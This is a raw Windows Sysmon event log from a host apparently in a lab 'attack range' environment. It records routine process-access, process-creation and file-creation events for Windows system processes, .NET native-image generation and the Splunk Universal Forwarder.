AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.124{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.108{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:44.108{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.811{59A5CD1D-9181-6005-B102-00000000A301}48964204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:45.671{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.531{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.530{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:45.530{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.405{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9181-6005-B002-00000000A301}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.390{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9181-6005-B002-00000000A301}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9181-6005-B002-00000000A301}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:45.311{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1310-0\System.ServiceModel.Web.dll2021-01-18 13:47:45.311 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9182-6005-B402-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.843{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9182-6005-B402-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:46.843{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9182-6005-B402-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\F